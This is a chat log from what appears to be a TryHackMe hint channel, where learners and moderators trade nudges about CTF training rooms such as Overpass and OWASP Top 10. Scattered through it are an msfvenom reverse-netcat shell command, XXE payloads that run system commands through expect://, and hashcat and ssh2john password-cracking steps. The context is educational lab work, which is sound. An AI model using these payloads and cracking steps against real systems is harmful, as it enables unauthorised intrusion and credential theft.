#room-hints

What do you call the IP address of your own router in your internal network?

any hint about Jeff's room !!

Thanks @white salmon

Anybody willing to give hints for overpass? Got user but am lost looking for root.

Can anyone give me a hint on Overpass ?

any hint about Jeff's room !!
@stoic jewel look at write up

!writeup jeff

Um can anyone tell me why priv esc is not working on Overpass

i don't want to spoil anything so that's why 🙃

You can ask help with spoiler tags, it's not an issue

Splunk room. "When viewing search results, it's often useful to rename fields using user-provided tables of values. What command do we include within a search to do this?" Surely it's ||rename||?
@radiant dew The answer to this question is the last one I'm missing from completing the room. Can anyone give a hint what the correct answer could be?

Can anyone give me a hint on Overpass ?
@vernal goblet what you want ?

any hint about Jeff's room !!
@stoic jewel sure, ask 🙂

@vernal goblet what you want ?
@keen willow
I found the admin page. Tried some sqli techniques, didn't worked. I need a hint to go forward

you should check more on admin page. you may want to use ||browser's developer's network tab||.

I did check that. It's using api that I know

||i did point my ip to curl but i do not seem to get a rev shell maybe i'm running the python server on wrong dir ?||

I did check that. It's using api that I know
@vernal goblet you need to get more info on how it is working.

||i did point my ip to curl but i do not seem to get a rev shell maybe i'm running the python server on wrong dir ?||
@edgy gorge copy the request and test it locally.

||curl localhost ?||

yup, on your attacker machine, where you started python server and wants to check if you have correct setup for reverse shell.

@radiant dew The answer to this question is the last one I'm missing from completing the room. Can anyone give a hint what the correct answer could be?
@white salmon I ended up looking through the Splunk docs for all six-letter commands and guessing a few. I kinda get what the question was going for, but I don't feel it's very well worded. Think about what command you would need to use if you wanted to access DATA from another table or a csv.

@radiant dew I'm also thinking about this brute force approach. 🙂

@radiant dew Thanks for the hint! I found it. I also think this question as well as some others are not very well-worded.

I'm still really happy they have a Splunk room and I would love more Blue Team rooms hint hint THM crew

I'm preparing a write-up for the Splunk room. Maybe it will be helpful for future visitors.

@white salmon #thm-community-media

We don’t post answers/writeups in this channel it defeats the purpose

@oblique cliff Sorry, I removed the URL.

Thanks

hey guys im at the linux room at task 43 - the true ending and i just need to get into the /root/root directory and to do that i gotta have sudo permissions but unfortanetely none of the shiba users has it 😭 what can i do?
@umbral tree same as me. even after checking on all users i still didn't figure out what to do... i found the user with sudo permissions but dont know what to do with this. 😫

@steep shard What is the user with sudo permission?

@rare zenith the user is nootnoot

@steep shard Yeah I found that too from a screenshot in a previous task but I can't login there.

i didnt even logged into it. i just changed the directory to his home folder

That doesn't change anything

maybe we're just tired, the room creator said the solution was in the room

In the sudo task it advised us to check the man page of sudo.

I'll probably check sth from therre

thanks for the advice

@steep shard @rare zenith y’all are on the right track if you’ve found that!

Id recommend now looking at the files each of the users own and see if you find any out of place

Ok I'll check it out thx

thank you @oblique cliff !

👍🏿

Hi there, any one doing/done https://tryhackme.com/room/owasptop10 ??

Just ask your question

Ok, here goes :- [Task 8] [Day 2] Broken Authentication Practical Wondering how it is allowing " darren" to be registered ? Is it because white spaces are not removed before inserting

still stuck on overpass. found ||/admin||. tried to use sqlmap and burpsuite to send xml payload but neither were successful. i know i need to use an owasp vuln, but totally stuck

@rotund skiff you passed the owasp top 10 i have a question about the task XML External Entity - Exploiting

@formal pier ask away

did you passed the task 17

yes, in the previous task xxe payload take that code and modify it

Anyone help with overpass ?

how far along overpass are you?

Just started

Kinda stuck

ahh ok yeah i'm stuck at the beginning too haha

run gobuster if you haven't already

@rotund skiff look at what else is on that page

Hey, I have a problem and since it's too long, (exceeds 2000 characters) discord won't accept it. Here's the link to the pastebin https://pastebin.com/kfvXZG9p

@white salmon hashcat ran just fine, look closely

@ashen violet ||login.js||?

Yes

@white salmon hashcat ran just fine, look closely
@rotund skiff Yes, but isn't supposed to use my GPU instead of my CPU (my GPU is pretty decent and I'd like it to use it).
Plus, it says Status...........: Cracked but I can't seem to find the password anywhere :c

In the OWASP room - there's this question: ||How can we specify XML version and encoding in XML document?|| - I thought it was: ||xml version|| but it isn't accepted. Am I missing the obvious?

look close

@rotund skiff Yes, but isn't supposed to use my GPU instead of my CPU (my GPU is pretty decent and I'd like it to use it).
Plus, it says Status...........: Cracked but I can't seem to find the password anywhere :c
@white salmon you got your pass

Damn it x)

i'm not sure about how to use the gpu, but the password is there they just don't make it obvious. look for where the original hash is displayed and you will see it

I though this meant the difficlty

In the OWASP room - there's this question: ||How can we specify XML version and encoding in XML document?|| - I thought it was: ||xml version|| but it isn't accepted. Am I missing the obvious?
@hasty gust read the material provided

i would ask about the gpu problem though

Thanks!

@indigo ridge I did. I'll read again. Must have missed something

yep

I mean it isn't necesssery atm soo

When I can add blog room walkthrough

go and add..btw there are already a lot of writeups

When I can add blog room walkthrough
@vapid zenith

oo I don't check that okk bro I will add it

@rotund skiff any progress bro ?

inspect the admin page, there is something there. not sure what to do with it though

https://pastebin.com/A3xEymnt
Well, well, well... what went wrong this time?

rengo which one are you on

Crack the hash, Task#2

https://embeddedworld.home.blog/2019/05/11/hacking-walk-through-cracking-the-hashes/

are you providing a wordlist?

Nop, just the hash and the number of characters ?a?a?a?a?a?a?a?a?a?a?a

https://embeddedworld.home.blog/2019/05/11/hacking-walk-through-cracking-the-hashes/
@rotund skiff Allright, this'll help

where is the metasploit payload stored?

@white salmon that writeup also tells you how to specify your gpu over cpu

@random thunder be more specific please

What Room? (Link, Room title, room code from URL)
What Task? (Give the number!)
What question? (Number, maybe also basic details)
What have you tried?
What happened?
What didn't happen?
What did you expect to happen?
A picture paints a thousand words. Don't type a thousand words. Screenshots are awesome. Photos of your screen are not.
(If you want to paint a picture, we'll be impressed but a screenshot is really better)

is there a specific location where the payload is stored? when i run msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R ?

It’s outputted right on the terminal

It’ll be mkfifo.....

It’s that line

@white salmon that writeup also tells you how to specify your gpu over cpu
@rotund skiff I tried using my GPU but it seems like it doesn't detect it 😮 :
`root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/Desktop/worldlist/rockyou.txt
hashcat (v6.0.0) starting...

No devices found/left.

Started: Sat Jul 18 15:03:42 2020
Stopped: Sat Jul 18 15:03:42 2020
root@kalinux:/home/idir# `

are you in a vm?

Nop

I use Kali Linux in dual boot

@rotund skiff I tried using my GPU but it seems like it doesn't detect it 😮 :
`root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/Desktop/worldlist/rockyou.txt
hashcat (v6.0.0) starting...

No devices found/left.

Started: Sat Jul 18 15:03:42 2020
Stopped: Sat Jul 18 15:03:42 2020
root@kalinux:/home/idir# `
@white salmon Try --force

@merry helm Like hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir --force?

@merry helm Like hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir --force?
@white salmon Yes

/home/dir/<wordlist> --force

Help with overpass anyone ?

One thing l noticed is that ||username and password are in clear text||

Is it of any avail ?

@merry helm `root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir --force
hashcat (v6.0.0) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
No devices found/left.

Started: Sat Jul 18 15:12:04 2020
Stopped: Sat Jul 18 15:12:04 2020
root@kalinux:/home/idir# `
Still :/

@shut pollen No. To get in, you need to find something in the dev console, specifically the network tab

or Application

@merry helm `root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir --force
hashcat (v6.0.0) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
No devices found/left.

Started: Sat Jul 18 15:12:04 2020
Stopped: Sat Jul 18 15:12:04 2020
root@kalinux:/home/idir# `
Still :/
@white salmon Missed comparison wordlist

hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/<wordlist> --force

rockyou wordlist can be found /usr/share/wordlists/rockyou.txt make sure you unzip it first

@fast swan thanks for the hint but I still don't get it

haha yeah me neither

`root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/Desktop/worldlist/rockyou.txt --force
hashcat (v6.0.0) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
No devices found/left.

Started: Sat Jul 18 15:17:48 2020
Stopped: Sat Jul 18 15:17:48 2020
root@kalinux:/home/idir# `
Even with the right path!...

rockyou wordlist can be found /usr/share/wordlists/rockyou.txt make sure you unzip it first
@rotund skiff Ok I'll try this

@fast swan thanks for the hint but I still don't get it
@shut pollen I can't really say much more without giving it away

You'll kick yourself when you get it

@rotund skiff Ok I'll try this
@white salmon Doesn't work, there's no wordlist folder in /usr/share/

strange, that comes default on kali

@white salmon Doesn't work, there's no wordlist folder in /usr/share/
@white salmon try wordlistS

`root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/Desktop/worldlist/rockyou.txt --force
hashcat (v6.0.0) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
No devices found/left.

Started: Sat Jul 18 15:17:48 2020
Stopped: Sat Jul 18 15:17:48 2020
root@kalinux:/home/idir# `
Even with the right path!...
@white salmon Omit -D

I mean, there's no folder that has 'word' inside

Like none, I checked

do what waldir said, just run on cpu for now

@white salmon Omit -D
@merry helm It works without -D

I just would like it to work with my GPU, it can be useful for some cracks

It just worked on cpu

go to #site-support and ask about the gpu

Okk

Thank you guys anyway

what command gives this result?

What do you mean

what command gets. me this result?

no clue, can you show us what you did

Seems like output from MOTD file

yeah looks like a welcome message you will get when you connect via ssh or something

this is the question and after running the script that's the result and i have no clue which commands can get that

@fast swan mind if i dm?

this is the question and after running the script that's the result and i have no clue which commands can get that
@random thunder Room

@random thunder Room
@final mortar https://tryhackme.com/room/commonlinuxprivesc

@fast swan mind if i dm?
@rotund skiff Sure!

Can't you just tell all the info in one message ? Am I supposed to guess which task https://i.imgur.com/cdSM9vE.png ?

task9 -> #2 * Sorry

You have to go to user5's home directory where there is a file called script as the question says

run that file and based on the output determine what command was executed

you can easily tell when you see it

shit sorry* got it now. i thought i ran and i got the welcome message and got stuck

PG-13 plz

I'm just gonna leave this here !rule1

!rule 1

Rule 1: No unsolicited direct messages (DMs) to other members of the discord. This includes staff. Verify that the member you are messaging is ok with you sending them DMs. The only exception to this rule is if a situation warrants the involvement of a moderator in order to handle something such as harassment or a situation where another member of the discord has made you feel uncomfortable.

@fast swan This is the reason he asked for your permission first. You can just decline it's not that much of an issue, but you can't quote rule 1 I think, not just yet

@final mortar I've had multiple haha

some people see someone accept the request and think it applies to all dms

@fast swan thanks for the hints on Overpass, I was way overthinking it!

@fast swan thanks for the hints on Overpass, I was way overthinking it!
@tropic flame No problems! I was as well last night. Completely overlooked it myself

@fast swan can i dm ?

@rotund skiff you got it ? (overpass foot)

hello guys doing vulnversity in task 4 Burpsuit bruteforce for file extension is not working .php,.phtml.php3,php4,php5

i tried all

Burp Response is Extension not allowed for all

Could you show us a screenshot of your Burpsuite intruder window?

And a example request

@white salmon

Show me a screenshot of the Request

any request works- as long as it's one of your intruder ones

Hmm

i'm sort of frustrated with with learn linux last task "The flag" .. i sort of looked almost everywhere, i used the find and grep commands .. to no avail. i am the point that i don't really know what to look for. tried looking for files that are sort of strange.

@valid rune Task, question?

I'm presuming it's the last one

learn linux last task

Task 43, only one question

Oops myb

@trim haven yes it is.

Have you been looking for files which are owned by specific users, which are also strange

@pseudo hamlet Try re-intercepting a file request again, and re-do the intruder setup

hmmmm i did lots of things .. i am at the point i forgot what i did.

If you could detail any commands you used and send them in spoiler text, I can nudge you to getting the correct command

I've seen payload encoding mess with it before. If it's on, turn it off and vice versa @pseudo hamlet

Oh right, I forgot about that too

i did use ||find|| , ||grep|| and ||ls|| and|| ls -al|| aloott

You can tell if encoding is on by looking at the Request of one of your attacks

No the commands, || find / [flag] [flag] [flag] ||

i did use ||find|| , ||grep|| and ||ls|| and|| ls -al|| aloott
@valid rune The task already says where the flag is, you have to look for a way to escalate

It does not

There's one flag on this machine and it's in /root/root.txt

You have to priv esc to get to it

It's a really easy way btw, just google a little

And I'm helping Crowsy find out what they need to do to priv esc.

by ||[flag]|| did you mean the command ||flag|| or the the answer which is the ||flag|| ?

By flag I mean, you can't just type find and expect it to do things, you have to give the command some flags etc to work look specifically.

i also never used google for this .. i'm trying finding out through the write ups and with in terminal manuals.

Use google for command documentation and examples too

You can easily find out through write-ups so if you're really using write-ups you're not trying hard enough

in Overpass,i ||Understood how the api works|| and what does it do , but i dont understand how to go further

Jabba, if you learn something from the write-up then you're fine

i did use ||find /* | grep ||

Don't do that

Find can do all the filtering you need

Don't pipe find to grep

You want to look for files belonging to each user, one by one

You may want to re-read the find section and or google

There's a flag for find to check the owner

@wraith tapir you don't have a username or password. You want to get in. It's not SQLi. Keeping working through the top 10 that's been covered so far

Aight i think that will do thanks

done Ty

hmmmm will try that again .. thanks guys.

i did go through the find task extensively .. but i guess i'm missing something

There's a whole room dedicated to the find command

yaahh i didn't get to that room yet

i'm following the learning path.

You're not locked in to that

You can take a break, do some rooms to build up your skills, and come back

need help overpass room

Help or a hint?

well i guess i'm going to do that. just going to try it this hour and if i couldn't .. i'll go to other rooms to build up my skill. but this is pretty very useful. i feel like i can use linux finally. i have tried soo many times in the past, i just couldn't.

hint, im stuck on started

It's totally ok spending a lot of time and being stuck

well i guess i'm going to do that. just going to try it this hour and if i couldn't .. i'll go to other rooms to build up my skill. but this is pretty very useful. i feel like i can use linux finally. i have tried soo many times in the past, i just couldn't.
@valid rune

find some ||/api|| but response is ||404 page||

It's part of infosec

find some ||/api|| but response is ||404 page||
@sick sun you're going to have to go learn about APIs then.

@bronze ivy usually in these cases i give up .. but this time i feel like it's a challenge and i need to solve it.

@stuck fractal so im on wrong path ?

I'm not going to answer that

But learn what an API is.

ok, i will learning again

need a hint/sanity check on overpass. I'm looking at something, but I don't know if I'm in a deep rabbit hole

I didn't build any real rabbit holes in, so chances are it's either one you've dug yourself or it's the right way

I'm stuck for some time in Overpass, I'll go back a few steps in learning, do not know how to proceed ...

maybe I need to take a break on overpass. I'm tunnel visioned. values won't change, just by starring at them, I guess 😄

can help with overpass as far as user.. Still working it haha

hints tho, can't tell you how

Also any hints for root priv esc please pm me 🙂

Also any hints for root priv esc please pm me 🙂
@odd panther How much enumeration have you done?

Because you should find something pretty quick

about 5 hours now...

Try some enum scripts

I'm still not close haha, normally not an issue with linux priv esc, I am jsut lost on this one, I am obviously missing it totally and i bet its staring me in the face. I will do more tho, I would assume a suid trick

My issue is this is the first box, I've not had the users password for things like sudo -l, so its throwing me off until I know more.

also thanks for the box too @stuck fractal is very good

It's not suid but you can get the user password

I won't tell you how, but once you've got a shell it's not that hard

oh? Ok, I will work on that first then thank

can help with overpass as far as user.. Still working it haha
@odd panther Do you mind going private and giving me a light?

na that's great i did not think i could, thank you.

Has something happened to the box? yesterday it was great, today can't even get ssh login (works but VERY slow) still waiting on the login...

You don't share instances here

So nothing has happened to the box

was lighting last night

It's a little slower if you're not a subscriber

oh..

ok

its so bad, i type "wget" and have to wait for it (20secs) to display lol

I've asked skidy to bump the resources

Nothing more I can do

@stuck fractal others including me are having issues with overpass, dk why it is laggy af and after 4-5 mins the box stops responding

Its ok changing vm also to test

Literally just answered that

be a subscriber

Problem solved

Its ok changing vm also to test
@odd panther wat

changing vm = Virtual machines.

Yes

I know what a VM is...

then why you like wat?

?

Because I have no idea what you meant by that statement

i see

Please don't dump answers

oki sry

there u go

may i have some help with no 6 pls

Room, task, question

Screenshots not phone pictures

Don't take a photograph of your screen. Take a screenshot.

some nudge on that ||api|| thing in overpass

Why do people take phone pics I don’t understand

check what its doing the API and follow along the code

cos i cant logon to discord on da laptop

cos its my cousins

room rpburpsuite

task 7

q6

some nudge on that ||api|| thing in overpass
@indigo ridge got foothold?

no

api is nothing

Woah what

Read the api files to see what its doing

Read the api files to see what its doing
@odd panther ...you can't

The API is serverside

You can look at the JS

sorry the .js

Thats done ,Making arbitrary req

To the api

Numerous req nothing seems to work dont know what im overlooking

same here

When you find it you will kick yourself too

Its one of the owasp top 10 that have been covered

In the ongoing 10 day challenge

Its one of the owasp top 10 that have been covered
@white salmon i think it is idor

Try em see you'll get it , its one of em

there is not param for idor

So If i sub this box will instantly start to respond? still VERY slow rn

(maybe too many on it free)

Its not like too many tho, But your ip got less resources so it doesnt work propery some times

subbing would do it faster

Much more resources

oh i see, yes its like it now. I may just sub then, was going to anyway

waiting is no fun xD

only a few on the box "376 users are in here"

That's not how boxes here work @odd panther

Its not like HTB

Oh single instance each?

yeah

ok nice, thanks.

@odd panther you can decrypt the rsa with openssl so you won't have to wait for "Enter the pass pharse" thing

i have the pass, but it still asks.

Yeah it will

(unless i did something wrong, ssh2john used)

You have to decrypt the key before you can use it

yea

You still need to use that passphrase

yeah

yeah i was

With overpass privesc, do I need to pivot to a different user to gain root or is there an easier way?

just box is slow, enter key wait login.... and wait... and wait... lol

@thorny nest https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md

just box is slow, enter key wait login.... and wait... and wait... lol
@odd panther Stop complaining. I've asked skidy to add more resources. Your choice is either wait, or put up with it.

Oh I'm ever so sorry for brining up and issue, I thought this was a place of help.. My bad...

jesus

You know, it is

But there's nothing that can be done RN

So you're just whining about the same issue that is being fixed

Right well no need to be a martyr buddy.. I asked a question for help..

No, you complained

That wasn't a question

Oh I'm ever so sorry for brining up and issue, I thought this was a place of help.. My bad...
@odd panther Yo man just tell me ill give you the flags

ok, As you say buddy

Not your buddy

ok pal

Not your pal.

ok love

Stop.

🔨

👀

literally stopped lol

@indigo ridge There is no reason for your comment, a mod has already told them to stop

sorry

ok not trying to moan here, but what is the best solution for this situation?

Use a correct username.

it keeps resetting, anyone else getting this too? Or am i the special one

redeploy

Your key isn't in a valid format

It's telling you that

it was telling me that before.. ok (and let me in) maybe why I'm confused and "moaning" as you put it.

No, you were complaining about the box speed

Which is being addressed

So you should be happy about that

Should I now, ok great thank you

Yep.

Glad you're satisfied.

Excellent >.<

Totally 🙂 (LOL)

Permission denied (publickey) how does one go about fixing this error?

while trying to ssh into a machine

Use a public key

if you only have private?

how would i resolve that

is there a way to generate a public via a private?

I'll try later for this, do you know when it may be back to speed at all @stuck fractal Or is it a more first come first serve basis here? thanks.

@worthy iris ssh -i /path/to/key <user>@<host>

@odd panther Once Skidy(one of the admins) comes online he will bump up the resources

Oh I see, ok thank you for the help. @tidal sedge

I do that, that's how I get the error, I only have a private rsa key

What are the permissions on the key?

700

should be 600

isn't it?

There is no reason for it to have u+x so, I'd set it to 600

so just having the private key alone isnt enough i take it

it should be, chmod 600 key then try to use it

same results 😦

Where is this from (what box?)

Guys need help in Vulnversity privesec

need some help at the overpass room can some one gimme a hint please

It helps when you actually say what you're struggling with

the login page don't know what todo exactly

I'm just going to go ahead and assume you probably need to enumerate more

the login page don't know what todo exactly
@fathom jolt What on the page do you see using Dev tools? (f12) look about

guys systemctl privesc help

@pseudo hamlethave you googled anything about that?

@odd panther Terminate, redeploy.

It's been bumped. You're welcome.

yes

i google privesec using sysctl

@pseudo hamlet https://gtfobins.github.io/

I thank Skidy for sure, your attitude while dealing with this was more then subpar sorry to say, so much so i don't even want to sub now due to you. but THANKS...

You're Welcome..

I'm going to assume that was a joke lol

Eh, they do nothing but complain about things that are being fixed

I came here for help tbh not to be chastised for a slow box i knew nothing of. Also I was asking, i never got an answer apart from some smart replies..

But still no issues, I do thank you for asking for the box to be updated. Just was not overly happy with how you spoke to me, I'll put it down to tiredness from you, I'm sure you're not this obtuse usually

I'll be honest, I really love thm.

I'm sure you don't complain this much about things that I'm actively trying to get fixed normally

but today you made me feel like i don't want to come for help lol

it should not be like that, your a mod to help man..

Ok I can see your still the same, James. Have a good day brother

Nah, just read up.. I disagree with ya there entirely

You may disagree with me, we can't all agree.

Anyway, off-topic for channel - convo dead

This was how i felt and you're quite right, its enough. Get cracking that box!!! (those who have not already)

I just went through wonderland

@fathom jolt What on the page do you see using Dev tools? (f12) look about
@odd panther did it but didn't found any thing

Where are you looking? Like see... how is the page loaded. What's being loaded, scripts etc, this is a good start on any box

Also I'll be honest, I'm a noob too, been at this 35days now lol so a lot to learn (why i ask here)

I didi and found that the passwords are encrypted in ||rot47|| but don't know where is || the file with encrypted passwords .. ||

I will mess things up I will ask

what box are you on?

Help with initial foothold in overpass... I know something is in l****.js but what... Idk... Some hints needed

Read the .js files, learn how it works. (its all we can really say at this stage)

It's the f**** function... I'm not understanding

|| authentication is broken ||

I don't think I can say more, its upto the mods here to help more, I feel If i give more its too much

I'm in Owasp to 10 today's task(day 6 - task 20) and I googled about pensive notes but unable to find the documentation

Anyone got anything?

O.o not even checked todays out!

Day 7 is not out yet?

day 6

Thanks changed it

Working now, wish the customers would hurry up so I can get back to the box's xD

yeah web app is running pensive notes which might have default creds but no luck by trying admin -admin but hint says look to documentation but no luck in finding it

What is the first question of the hint ?

app source code

this is gold: https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A6-Security_Misconfiguration

No idea

owasp day 6 . app source code ,,, any hints for that ?

Stuck on the same

What's a common website used to share source code for open source projects?

Google doesn't index everything

Hi, does anyome know how to replace firstName name also with any ENTITY ??
<!DOCTYPE replace [<!ENTITY name "Test"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>

Also, want to run other system command like id,ls,ps but they are not working on https://tryhackme.com/room/owasptop10
Used this but no result:-
<?xml version=”1.0″ encoding=”utf-8″?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM “expect://id” >]>
<root>
<name>&xxe;</name>
</root>

Doesn't that assume expect is enabled?

Wrong chat😅

ok in to the site. again read the code lol

ok so expect is not enabled then, but if yes than this should work ? another example :- <?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'expect://id'>]>
<root>&read;</root>

What's a common website used to share source code for open source projects?
@stuck fractal Well played

Try not to spoil it

This was damnnnn dirtyyyyy😂😂😂😂😂😂😂😂

Try not to spoil it
@stuck fractal that spoiled the fun for me i finally got it 😆

lol i didn't read the readme and got straight to the database and tried to crack that PW with rockyou - without success

lol i didn't read the readme and got straight to the database and tried to crack that PW with rockyou - without success
@white salmon
I was going to do the same

Therefore reminder: RTFM!

I am suspecting... If the same solution is for overpass initial foothold🤔

Nope.

Anyone getting anything from the source code of the webapp for day 6??

What's a common website used to share source code for open source projects?
@stuck fractal

I can't even find it on there, need better google fu

Don't use google

Google doesn't index everything

Oh god you really know how to mess me up James haha

Don't use google
@stuck fractal
That’s a first

Second.

It applied in Advent Of Cyber too

@stuck fractal I used developer options to see the HTML code but I'm not getting anything in it

You're looking for serverside information by viewing client-side code?

That fact that you actually know the count is impressive enough

oh so we can enum? I've only been using the dev tools lol

Do what you want with the VM and webapp, but there's an intended solution

I would rather go intended, I'm here to learn, if not very slowly. I mean its intended for a reason so I should aim for it

@stuck fractal well I thought it was similar to the day 3 one

@odd panther Have you seen the hint I've given?

you can google open source community

no... but let me stare at your words for a while, I bet its obv too.. thank you again

What's a common website used to share source code for open source projects?

yeah i know, but i can't find this on it

Closed room, thank you to the colleague @odd panther who assisted me in the first steps.

Da man! Good job!

I can confirm you can find it

Don't have to be signed in or anything

A good challenge, I learned new things, thank you @stuck fractal

I am doing the Blue Primer Networking room but I am stuck on this problem, can someone please give me a hint:

Please don't show answers

Sorry it was part of a two part question

Let me try again

The second is similar to the first

ok thank you. (i've not done any enum thought it was not ok for this one, doing now)

https://superuser.com/questions/905660/what-other-ip-addresses-can-should-i-use-for-my-home-network

is it a bad habit if i always used pipe and grip after find to find certain files ? (because apparently i don't know how to use find properly)

Yes

find / -iname "*someSubString*" 2>/dev/null is a really useful command to understand

https://superuser.com/questions/905660/what-other-ip-addresses-can-should-i-use-for-my-home-network
@stuck fractal None of the answers/comments shown have a format of xxx.xxx.x.x that I need to answer the problem

hmmmm ... yahh i don't seem to understand that who line you just wrote

that whole*

@stuck fractal None of the answers/comments shown have a format of xxx.xxx.x.x that I need to answer the problem
@sinful badger Eh, I found various answers in there. And with a few google searches

@valid rune -iname is for case insensitive

@stuck fractal also sorry for my attitude earlier.

Apology accepted

aww, that's sweet

@sinful badger Have you ever set up a network for your home or business before?

I just realised how much of a hint I gave in the room text on Day 6

And a hint on the question

That's assuming people actually read the room/task text

any other hints for Overpass challenge 😐

The answers seem to say these are the three ranges:
192.168.0.0 - 192.168.255.255
172.16.0.0 - 172.31.255.255
10.0.0.0 - 10.255.255.255

Yep

Unless the answer is 192.168.x.x

It's not asking for a range though

It's asking for a single network

second common private home range

Ok well that's misleading but yeah

It's looking for a network

@inland onyx Could I get you to fix that on BP networking?

Okay I think I'm just dumb then

I mean it's fairly close to the first

192.168.x.x doesn't work when I put it in the answer though

Yeah, that question is kinda weird

192.168.x.x doesn't work when I put it in the answer though
@sinful badger Nope, because that's not how you denote a network

Typically, 192.168.x.0/24 is used, so only the last octet will change

So logically, the next one up from the answer before

192.168.x.0 does not seem to work either

You're close- stop being too broad and be more specific

Nope, because you put an x in there

That's not how you write a network, properly.

I just wanted to say thanks to @odd panther and @stuck fractal for the hints in their convo about today's OWASP challange. For such an easy one, it took me down some weird paths. 😅 Cheers!

It's asking for the second most common IP network configuration basically

@stuck fractal @white salmon Thanks, I got the answer now

Awesome!

any other hints for Overpass challenge 😐

Glad you found it :D

any other hints for Overpass challenge 😐
@random thunder Where have you got so far?

@random thunder Where have you got so far?
@stuck fractal able to run the executable on my machine but unsure about the service parameter 😐

You created your own rabbit hole

Also, don't run random binaries on your own machine

Unless you've RE'd them

Iam stuck and i have no clue where to proceed now

It's an OWASP top 10 web vuln

That's in the hints

So maybe some more web enumeration would help you out here?

@stuck fractal able to run the executable on my machine but unsure about the service parameter 😐
@random thunder I thought that was actually a rabbit hole, I could not get any sense but also I am bad a RE on ELF

I mean you're given the source code lol

I don't know the language 😦 haha but your right I only need to learn more

It's a rabbit hole, but one that you throw yourself into

It reads like most curly brace languages

It reads like most curly brace languages
@stuck fractal here comes a new defenition, lol

thought, you were talking abt ||.js|| isn't that ?

No

But Go and JS are both curly brace languages

They have a similar structure

fish, but thats fits on that too.

here comes a new defenition, lol no idea what you mean tho

I have to learn how to make a shell in go with the ability to upload and download files.. I don't know go.. so that will be fun

reverseshell sorry

If it's for overpass, you really don't

for Mcsi training

I searched about... ||fetch function|| anf the entire ||login.js|| appears to be the intended way for login... What is the loophole here

It's an OWASP top 10 web vuln that's been covered in the first 3 days

any hint for privesc on overpass?

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md

tnx

any hints on how to access the machine to run the code? @stuck fractal

Them feels

dont @ james anyone can help you

You're fixating on the code @random thunder

Thank you to @merry helm r and @stuck fractal for the help

Stop fixating on the code

Okay.

Flag 3 is located where bob's bash history gets stored. and Flag 4 is located where cron jobs are created. require privesc, right ?

No

404 users Nice

@valid rune You have to find where these locations are, and then the flag.txt will be located inside of them.

Or the flag will be text inside those files

i tried with bob's bash history, but it required privs

same as crontabs .. they require privs

They don't

You're looking in the wrong area

You can view the history by typing one word

Wrong place

Hey everyone, I am stuck on Day 6 of OWASP Top 10 challenge. I have looked through the page source and found a comment ||js/cookie.js|| I tried to use ||github|| to look for the application name and also the javascript but could not find anything. I am not sure if I missed something or I overlooked it.

Hey everyone, I am stuck on Day 6 of OWASP Top 10 challenge. I have looked through the page source and found a comment ||js/cookie.js|| I tried to use ||github|| to look for the application name and also the javascript but could not find anything. I am not sure if I missed something or I overlooked it.
@plucky steppe you were looking in the right place on one of those

Any alternative for sudo -l???

That does not ask me for a password

@white salmon hmm interesting is the source code that the hint talk about for the ||js-cookie v3.0.0-beta.4||?

@rapid flower There's other tools you can use such as linpeas to enumerate for potential privilege escalation opportunities.

@rapid flower There's other tools you can use such as linpeas to enumerate for potential privilege escalation opportunities.
@tropic flame
Is that possible on ||overpass||

Hello everyone! Can someone give me a hint? I am stuck at security configuration from the OWASP top 10 room

@white salmon hmm interesting is the source code that the hint talk about for the ||js-cookie v3.0.0-beta.4||?
@plucky steppe I cloned this repo and I did not find any default credentials 😩

@rapid flower yes, you would have to serve up a local server and use wget to get it, but it's not needed on Overpass.

Okay

Will look for some other way

Anyone can that can help me?

@frank lagoon Could you give a little more information about what you're stuck on and what you've done already?

@crystal saffron dont really want to reveal the ans in here. Theres a massive hint slightly earlier in this chat 👍

@white salmon sure

So I tried to look at the source code, found that it looks for a cookie with a value, I changed that value and the server tought that I was a user, it sent me to /mynotes/. I tried to create a note --> didn't work.

Tried directory bruteforcing, logging in via ssh with default creds, tried default creds on the web login form @white salmon

can i dm some one about overpass?

no need for dm just send your question here

You're looking in the wrong place @frank lagoon

can i dm some one about overpass?
@cedar coral yeah

Yep that's what I tought

I readed most of the js files

I am very lost now I am still trying to look at ||github|| but cannot find anything that seems as a security misconfiguration

The text in the OWASP room tells you exactly what the vulnerability is

Am I looking at the right place? Path: /api/note/list

Still no

fork:can't allocate memory 🙂 @stuck fractal

Check the hint in the room

@buoyant grove Wasn't me.

Overpass *

I already did it

@buoyant grove keep trying i had that, but wait in between

it will work for you

@frank lagoon So you know from the hint in the room that you need to find the source code

it will work for you
@odd panther okay thxx

Yes from cookie.js?

no

Once you have the source code credentials are in plain text

The source code

Not clientside JS

How?

I can't find anything related to that app that is installed

I think it is ||cookie.js|| am I right?

No

Find the source code

It's an open source program

Pensive notes?

@white salmon use the double pipes

Thanks MrRobot

|| there is a place where people upload source code ||

Lmao

|| github? ||

